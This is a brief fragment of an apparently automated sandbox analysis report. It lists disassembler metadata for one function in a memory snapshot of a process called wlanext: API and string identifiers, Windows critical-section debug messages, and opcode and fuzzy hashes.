                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: d419c51b9a75e7162293f49ae42cb7fbe4e58d5022438a1875c4efbbfec92a59
                    • Instruction ID: a77c08b410e4a9bd98df8ba08318ef9d5aa08268d2e7542b81c55bc88d5f9bb8
                    • Opcode Fuzzy Hash: d419c51b9a75e7162293f49ae42cb7fbe4e58d5022438a1875c4efbbfec92a59
                    • Instruction Fuzzy Hash: D3F0C236A00201BFE6259A45DC82E67BB6AEB45730F144214F7285A9E1DA62F83086A4
                    Uniqueness

                    Uniqueness Score: -1.00%